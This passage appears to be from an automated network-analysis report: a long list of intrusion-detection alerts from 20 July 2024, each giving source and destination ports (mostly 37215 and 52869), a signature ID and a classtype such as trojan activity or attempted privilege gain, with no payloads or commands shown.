                      Source Port:41596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.565132
                      SID:2027339
                      Source Port:57282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.060998
                      SID:2829579
                      Source Port:38858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.154049
                      SID:2027339
                      Source Port:43950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.039719
                      SID:2835222
                      Source Port:56254
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.921490
                      SID:2831300
                      Source Port:52538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.392527
                      SID:2025132
                      Source Port:56686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.676253
                      SID:2831300
                      Source Port:44594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.608320
                      SID:2027339
                      Source Port:47468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633742
                      SID:2835222
                      Source Port:49618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.724151
                      SID:2025132
                      Source Port:41746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2835222
                      Source Port:41416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.659435
                      SID:2831300
                      Source Port:39710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.456461
                      SID:2831300
                      Source Port:51876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.084300
                      SID:2831300
                      Source Port:40496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.885722
                      SID:2027339
                      Source Port:55240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.320679
                      SID:2831300
                      Source Port:57774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.975158
                      SID:2835222
                      Source Port:58306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.624224
                      SID:2831300
                      Source Port:60474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.631864
                      SID:2831300
                      Source Port:47372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.672944
                      SID:2027339
                      Source Port:55890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.555689
                      SID:2025132
                      Source Port:52848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.354418
                      SID:2027339
                      Source Port:44534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.148759
                      SID:2831300
                      Source Port:44778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.262355
                      SID:2025132
                      Source Port:57412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.934726
                      SID:2027339
                      Source Port:46990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982478
                      SID:2835222
                      Source Port:43552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.668312
                      SID:2025132
                      Source Port:45842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.646615
                      SID:2831300
                      Source Port:54664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2835222
                      Source Port:53820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.173843
                      SID:2027339
                      Source Port:47334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.482723
                      SID:2027339
                      Source Port:58162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.303669
                      SID:2025132
                      Source Port:41978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.038834
                      SID:2831300
                      Source Port:45048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2829579
                      Source Port:48014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2829579
                      Source Port:55162
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.207937
                      SID:2027339
                      Source Port:58860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.320095
                      SID:2025132
                      Source Port:34398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2835222
                      Source Port:42332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.501090
                      SID:2831300
                      Source Port:35970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.039129
                      SID:2835222
                      Source Port:32866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.030401
                      SID:2027339
                      Source Port:36084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.418920
                      SID:2027339
                      Source Port:47852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.274940
                      SID:2027339
                      Source Port:44924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2829579
                      Source Port:34754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.250892
                      SID:2027339
                      Source Port:60948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818842
                      SID:2829579
                      Source Port:60604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2835222
                      Source Port:45164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2835222
                      Source Port:50810
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.871315
                      SID:2831300
                      Source Port:47422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.722890
                      SID:2831300
                      Source Port:44964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.133788
                      SID:2025132
                      Source Port:57830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.798104
                      SID:2027339
                      Source Port:52252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.167781
                      SID:2027339
                      Source Port:52466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039128
                      SID:2835222
                      Source Port:33546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.885082
                      SID:2027339
                      Source Port:42284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.423031
                      SID:2025132
                      Source Port:43584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.775483
                      SID:2027339
                      Source Port:43032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.873078
                      SID:2831300
                      Source Port:51952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2835222
                      Source Port:44916
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.808195
                      SID:2027339
                      Source Port:33692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.501891
                      SID:2027339
                      Source Port:53774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.562834
                      SID:2027339
                      Source Port:53128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.392836
                      SID:2027339
                      Source Port:56896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.275988
                      SID:2025132
                      Source Port:39732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2835222
                      Source Port:45286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.991143
                      SID:2829579
                      Source Port:35088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:37.919900
                      SID:2027339
                      Source Port:35978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.986585
                      SID:2831300
                      Source Port:49714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.383579
                      SID:2027339
                      Source Port:43468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.062246
                      SID:2027339
                      Source Port:54704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.069241
                      SID:2831300
                      Source Port:37284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2835222
                      Source Port:36734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.124824
                      SID:2027339
                      Source Port:35310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.597662
                      SID:2831300
                      Source Port:36710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.580365
                      SID:2027339
                      Source Port:55990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.642551
                      SID:2027339
                      Source Port:56348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.267254
                      SID:2025132
                      Source Port:51136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.443835
                      SID:2025132
                      Source Port:52384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.220244
                      SID:2027339
                      Source Port:37292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.085493
                      SID:2025132
                      Source Port:60514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044417
                      SID:2829579
                      Source Port:54706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2829579
                      Source Port:60584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2835222
                      Source Port:48598
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.263272
                      SID:2027339
                      Source Port:43816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.302531
                      SID:2025132
                      Source Port:49410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.318206
                      SID:2027339
                      Source Port:59666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.749294
                      SID:2831300
                      Source Port:55868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.014738
                      SID:2025132
                      Source Port:44048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.852700
                      SID:2027339
                      Source Port:50044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.464382
                      SID:2027339
                      Source Port:60824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.943232
                      SID:2831300
                      Source Port:43862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.790100
                      SID:2027339
                      Source Port:35768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.298259
                      SID:2025132
                      Source Port:59392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.735607
                      SID:2025132
                      Source Port:50640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.096223
                      SID:2025132
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.116386
                      SID:2027339
                      Source Port:47788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.745095
                      SID:2025132
                      Source Port:36580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.157619
                      SID:2835222
                      Source Port:55882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.104072
                      SID:2027339
                      Source Port:45002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2829579
                      Source Port:53918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2829579
                      Source Port:33796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2829579
                      Source Port:33808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2835222
                      Source Port:54644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.903232
                      SID:2831300
                      Source Port:51704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.250039
                      SID:2831300
                      Source Port:38152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.974837
                      SID:2829579
                      Source Port:35808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.527952
                      SID:2831300
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.037292
                      SID:2025132
                      Source Port:57826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.138392
                      SID:2831300
                      Source Port:58154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.578308
                      SID:2027339
                      Source Port:42790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.325103
                      SID:2027339
                      Source Port:57446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.731228
                      SID:2027339
                      Source Port:35482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.288562
                      SID:2027339
                      Source Port:38702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.584507
                      SID:2027339
                      Source Port:35960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.141970
                      SID:2027339
                      Source Port:45448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.321189
                      SID:2027339
                      Source Port:55696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2829579
                      Source Port:59032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.758699
                      SID:2025132
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.176893
                      SID:2025132
                      Source Port:36354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.327422
                      SID:2027339
                      Source Port:57670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.118192
                      SID:2025132
                      Source Port:33128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.021704
                      SID:2027339
                      Source Port:38126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.220119
                      SID:2027339
                      Source Port:35088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2829579
                      Source Port:40244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.217142
                      SID:2025132
                      Source Port:32860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2835222
                      Source Port:34472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312614
                      SID:2027339
                      Source Port:56772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.747994
                      SID:2025132
                      Source Port:48270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.153608
                      SID:2829579
                      Source Port:53610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045143
                      SID:2829579
                      Source Port:59604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313383
                      SID:2831300
                      Source Port:34288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.085493
                      SID:2027339
                      Source Port:48974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2829579
                      Source Port:40256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.638042
                      SID:2829579
                      Source Port:51356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2829579
                      Source Port:36700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.020177
                      SID:2027339
                      Source Port:56560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2835222
                      Source Port:38094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.165718
                      SID:2027339
                      Source Port:36230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.958887
                      SID:2027339
                      Source Port:36624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.304951
                      SID:2027339
                      Source Port:45530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2829579
                      Source Port:48934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.345185
                      SID:2027339
                      Source Port:43504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.280418
                      SID:2025132
                      Source Port:49070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.984532
                      SID:2027339
                      Source Port:44358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.323034
                      SID:2829579
                      Source Port:57026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.966822
                      SID:2027339
                      Source Port:41232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2835222
                      Source Port:43754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.677301
                      SID:2027339
                      Source Port:55986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2835222
                      Source Port:39240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.631864
                      SID:2831300
                      Source Port:49044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.921076
                      SID:2831300
                      Source Port:35244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2835222
                      Source Port:45804
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572556
                      SID:2027339
                      Source Port:54124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.755147
                      SID:2025132
                      Source Port:45994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.638879
                      SID:2027339
                      Source Port:51800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.888072
                      SID:2831300
                      Source Port:53918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2835222
                      Source Port:41502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.554229
                      SID:2027339
                      Source Port:45798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.730392
                      SID:2027339
                      Source Port:52548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.489022
                      SID:2027339
                      Source Port:35434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.793488
                      SID:2027339
                      Source Port:57682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.813625
                      SID:2025132
                      Source Port:51160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.992285
                      SID:2025132
                      Source Port:37240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.175742
                      SID:2835222
                      Source Port:39616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.225146
                      SID:2831300
                      Source Port:36688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.147289
                      SID:2025132
                      Source Port:47782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.072641
                      SID:2831300
                      Source Port:42140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2835222
                      Source Port:44780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.892811
                      SID:2027339
                      Source Port:35576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.723224
                      SID:2025132
                      Source Port:45188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.956473
                      SID:2027339
                      Source Port:35810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.440143
                      SID:2027339
                      Source Port:55764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.589760
                      SID:2027339
                      Source Port:51690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.624541
                      SID:2025132
                      Source Port:48202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.750140
                      SID:2025132
                      Source Port:60326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.685722
                      SID:2027339
                      Source Port:50136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.966302
                      SID:2829579
                      Source Port:43454
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.996260
                      SID:2831300
                      Source Port:39878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.782707
                      SID:2025132
                      Source Port:56436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.672944
                      SID:2027339
                      Source Port:50556
